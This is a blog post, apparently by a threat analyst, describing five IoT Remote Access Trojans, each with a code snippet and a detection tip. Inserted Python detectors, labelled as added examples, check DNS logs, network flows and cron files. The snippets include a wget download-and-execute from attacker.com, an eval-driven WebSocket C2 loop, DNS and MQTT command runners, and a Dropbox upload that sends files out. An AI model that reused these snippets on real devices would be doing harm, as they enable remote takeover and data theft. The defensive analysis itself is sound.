If you think IoT devices are just harmless smart assistants or home cameras, think again. In 2025, cybercriminals are exploiting these everyday conveniences as entry points for powerful Remote Access Trojans (RATs). I’ve tracked and reverse-engineered several IoT RATs this year, and it’s clear they’re no longer script-kiddie tools. These RATs are modular, stealthy, and devastating.
In this post, I’ll walk through five of the most dangerous IoT-focused RATs currently in the wild. But before diving in, let’s quickly establish what makes an IoT RAT different from the desktop or mobile variants.
What Are IoT Remote Access Trojans?
IoT Remote Access Trojans are malware designed specifically to target and control internet-connected devices like routers, IP cameras, smart TVs, and even refrigerators. Unlike typical RATs, which rely on full operating systems like Windows or Android, IoT RATs have to operate with minimal system resources and often without standard APIs.
That constraint has pushed their developers to get creative. Most IoT RATs:
Exploit weak/default credentials or outdated firmware.
Use lightweight payloads written in C, Lua, or Python.
Communicate over obscure or non-standard ports.
Persist using cron jobs, init scripts, or patched binaries.
Here are the top offenders I’ve come across in 2025.
1. NOIRWorm
Overview: NOIRWorm targets consumer-grade IP cameras and DVRs. It spreads laterally within home networks and uses compromised devices for surveillance or DDoS-for-hire.
Implementation Strategy:
Brute-forces Telnet and SSH using hardcoded credentials.
Drops a statically compiled MIPS binary.
Connects to a Tor-hidden C2 server.
Code Walkthrough (BusyBox infection shell snippet):
if wget http://attacker.com/noir -O /tmp/noir; then
chmod +x /tmp/noir
/tmp/noir &
fi
Detection Tip: Monitor for unknown processes running BusyBox with network sockets open. Deploy honeypots to catch brute-force attempts.
2. IoTReaper++
Overview: An upgraded version of the original IoTReaper, this variant adds WebSocket-based C2 and support for newer smart thermostats and cameras.
Implementation Strategy:
Scans for web interfaces on port 80/443.
Injects JavaScript into the device’s admin panel to create persistent sockets.
Controls the RAT using browser-like C2 sessions.
Code Walkthrough (Injected JavaScript payload):
let ws = new WebSocket('wss://attacker.site/c2');
ws.onmessage = (event) => {
eval(event.data);
};
Detection Tip: Analyze the source code of embedded web panels. Flag devices making unexplained persistent WebSocket connections to unknown domains.
3. ShadowBot
Overview: ShadowBot is an ARM-compiled binary that turns infected IoT devices into proxy relays and command execution nodes. It’s often found in botnets used for anonymizing cybercrime.
Implementation Strategy:
Uses UPnP to expose internal ports.
Installs custom iptables rules to route traffic.
Periodically polls a C2 server via DNS.
Code Walkthrough (Embedded DNS C2 resolver in C):
char *lookup_domain = "cmd.shadowdns.co";
struct hostent *host = gethostbyname(lookup_domain);
if (host) {
execute_command(host->h_addr);
}
Detection Tip: Use deep DNS inspection. Any IoT device resolving a domain multiple times per minute should raise a red flag.
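A small detector for the DNS polling pattern described in this tip, added here as an example that is not part of the original post: it runs over constructed resolver log lines and flags any device that resolves the same name more than a threshold number of times inside a one-minute sliding window. The log format, the threshold and the hostnames are assumptions.

```python
"""Detect IoT devices that resolve the same domain repeatedly in a short window.

Added example (not from the original post). Log format assumed:
"<ISO timestamp> <client_ip> <queried_domain>", one query per line.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample resolver log: one device polling a C2-style name every 10 s
SAMPLE_DNS_LOG = """\
2025-03-01T10:00:01 192.168.1.20 time.example.org
2025-03-01T10:00:05 192.168.1.42 cmd.example-c2.test
2025-03-01T10:00:15 192.168.1.42 cmd.example-c2.test
2025-03-01T10:00:25 192.168.1.42 cmd.example-c2.test
2025-03-01T10:00:35 192.168.1.42 cmd.example-c2.test
2025-03-01T10:00:45 192.168.1.42 cmd.example-c2.test
2025-03-01T10:01:30 192.168.1.20 firmware.example.org
2025-03-01T10:02:00 192.168.1.42 cmd.example-c2.test
"""

def parse_dns_log(text):
    """Yield (timestamp, client, domain) tuples from the log text."""
    for line in text.splitlines():
        ts, client, domain = line.split()
        yield datetime.fromisoformat(ts), client, domain.lower()

def find_dns_beacons(text, max_per_window=4, window=timedelta(minutes=1)):
    """Return {(client, domain): peak} for pairs whose query count inside any
    sliding window of length `window` exceeds max_per_window."""
    per_pair = defaultdict(list)
    for ts, client, domain in parse_dns_log(text):
        per_pair[(client, domain)].append(ts)
    flagged = {}
    for pair, times in per_pair.items():
        times.sort()
        start, peak = 0, 0
        for end, ts in enumerate(times):
            # Advance the window start until every kept timestamp fits in `window`.
            while ts - times[start] >= window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > max_per_window:
            flagged[pair] = peak
    return flagged

if __name__ == "__main__":
    for (client, domain), n in find_dns_beacons(SAMPLE_DNS_LOG).items():
        print(f"ALERT {client} resolved {domain} {n} times within one minute")
```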
4. MiraiX
Overview: MiraiX is the latest variant of the infamous Mirai botnet, redesigned for microcontrollers in smart meters and smart locks. It’s smaller, harder to detect, and runs on embedded RTOS environments.
Implementation Strategy:
Compiled with stripped symbols to reduce binary footprint.
Injects itself into firmware memory.
Uses MQTT for encrypted communication.
Code Walkthrough (MQTT Client Init in C++):
MQTTClient client("iot-server.local", 1883);
client.setCallback([](string topic, string msg) {
execute_command(msg.c_str());
});
client.subscribe("/iot/cmd");
Detection Tip: Inspect outbound MQTT connections. Unexpected connections to public brokers, or encrypted MQTT over TCP/8883 to a broker the device has no business talking to, are often suspicious.
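One way to act on this tip and the WebSocket tip from the IoTReaper++ section together, as an added example that is not part of the original post: it evaluates constructed flow records of the kind an egress sensor or NetFlow collector exports, and alerts on IoT-subnet devices holding a long-lived WebSocket to an unknown host or speaking MQTT to a non-allowlisted broker. The IoT subnet, the allowlist and the flow record layout are assumptions.

```python
"""Flag persistent WebSocket and MQTT sessions from IoT devices to unexpected hosts.

Added example (not from the original post); IoT subnet, allowlist and flow format are assumed.
"""
import ipaddress
from dataclasses import dataclass

IOT_SUBNET = ipaddress.ip_network("192.168.50.0/24")   # assumed IoT VLAN
ALLOWED_HOSTS = {"mqtt.vendor.example", "updates.vendor.example"}  # assumed vendor endpoints
MQTT_PORTS = {1883, 8883}
WEB_PORTS = {80, 443}
LONG_LIVED_SECONDS = 300   # a WebSocket held open this long counts as persistent

@dataclass
class Flow:
    src: str          # device IP
    dst_host: str     # destination hostname (from DNS or TLS SNI) as the sensor saw it
    dst_port: int
    duration: float   # seconds the session stayed open
    app: str          # sensor's protocol label: "websocket", "mqtt" or "http"

# Constructed sample flows: a thermostat holding a WebSocket to an unknown host,
# a lock talking MQTT to a public broker, benign vendor traffic, and a non-IoT host.
SAMPLE_FLOWS = [
    Flow("192.168.50.12", "updates.vendor.example", 443, 12.0, "http"),
    Flow("192.168.50.12", "relay.unknown-host.test", 443, 3600.0, "websocket"),
    Flow("192.168.50.30", "mqtt.vendor.example", 8883, 7200.0, "mqtt"),
    Flow("192.168.50.31", "broker.public-mqtt.test", 8883, 900.0, "mqtt"),
    Flow("10.0.0.5", "relay.unknown-host.test", 443, 3600.0, "websocket"),
]

def classify_flow(flow):
    """Return an alert string for a suspicious flow, or None if it looks benign."""
    if ipaddress.ip_address(flow.src) not in IOT_SUBNET:
        return None                      # only IoT devices are in scope here
    if flow.dst_host in ALLOWED_HOSTS:
        return None
    if flow.app == "mqtt" and flow.dst_port in MQTT_PORTS:
        return f"{flow.src}: MQTT to non-allowlisted broker {flow.dst_host}:{flow.dst_port}"
    if flow.app == "websocket" and flow.dst_port in WEB_PORTS and flow.duration >= LONG_LIVED_SECONDS:
        return f"{flow.src}: persistent WebSocket to unknown host {flow.dst_host} ({flow.duration:.0f}s)"
    return None

def find_suspicious_flows(flows):
    """Return the alert strings for every suspicious flow in `flows`."""
    return [alert for alert in map(classify_flow, flows) if alert]
```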
5. PyWasp
Overview: PyWasp is a Python-based RAT deployed on Raspberry Pi-based IoT devices in industrial control systems. It’s designed for persistence and low-noise data theft.
Implementation Strategy:
Installs via SSH using stolen keys.
Uses cron jobs to survive reboots.
Sends logs and screen captures to Dropbox or Mega.
Code Walkthrough (Main loop):
import dropbox
client = dropbox.Dropbox('ACCESS_TOKEN')
with open('/tmp/metrics.log', 'rb') as f:
client.files_upload(f.read(), '/metrics.log')
Detection Tip: Audit cron jobs and SSH keys on embedded Linux systems. Flag IoT traffic to cloud storage services like Dropbox or Mega.
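A host-side audit for the two artifacts this tip names, added here as an example that is not part of the original post: it parses constructed crontab and authorized_keys text, flags cron entries that restart something from a writable path or pipe a download into a shell, and reports SSH keys whose fingerprint is not in an approved inventory. The marker list, the inventory and the sample files are assumptions.

```python
"""Audit crontab and authorized_keys content on an embedded Linux host.
Added example (not from the original post); markers, key inventory and samples are assumed."""
import hashlib

SUSPICIOUS_CRON_MARKERS = ("@reboot", "/tmp/", "/dev/shm/", "wget ", "curl ", "| sh", "| bash")

def key_fingerprint(key_body):
    """Simplified fingerprint: SHA-256 of the base64 key body (not OpenSSH's own format)."""
    return hashlib.sha256(key_body.encode()).hexdigest()

APPROVED_KEY_BODY = "AAAAC3NzaC1lZDI1NTE5AAAAIExampleApprovedKeyBody0000000000000000"
APPROVED_FINGERPRINTS = {key_fingerprint(APPROVED_KEY_BODY)}   # assumed key inventory

# Constructed sample crontab from a Raspberry Pi metrics collector
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 * * * * /usr/local/bin/collect_metrics.sh
@reboot /tmp/.sync/agent.py
*/5 * * * * curl -s http://updates.unknown-host.test/u | sh
"""

# Constructed sample authorized_keys: one inventoried key and one that is not
SAMPLE_AUTH_KEYS = (
    f"ssh-ed25519 {APPROVED_KEY_BODY} ops-admin@mgmt\n"
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleUnknownKeyBody000000000000000 build@unknown\n"
)

def audit_crontab(text):
    """Return (line, matched_markers) for crontab entries that hit a marker."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        hits = [m for m in SUSPICIOUS_CRON_MARKERS if m in line]
        if hits:
            findings.append((line, hits))
    return findings

def audit_authorized_keys(text):
    """Return (key_type, comment) for keys not in the inventory (option-prefixed lines not handled)."""
    unknown = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        comment = parts[2] if len(parts) > 2 else ""
        if key_fingerprint(parts[1]) not in APPROVED_FINGERPRINTS:
            unknown.append((parts[0], comment))
    return unknown
```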
Conclusion
IoT devices are often treated as background infrastructure – plug them in, forget them. That mindset is what allows these RATs to flourish. They exploit weak configurations, hide in firmware, and communicate over unexpected protocols.
From Tor tunnels in IP cameras to MQTT in smart locks, 2025’s IoT RATs are sophisticated and quiet. They don’t just disrupt your smart home; they infiltrate corporate networks through rogue smart plugs and HVAC units.
I recommend using device discovery tools like Nmap with custom IoT signatures and combining them with memory analysis tools like Volatility or network behavior analysis with Suricata. If you’re a blue teamer, start segmenting IoT traffic, applying outbound firewall rules, and watching those low-bandwidth anomalies.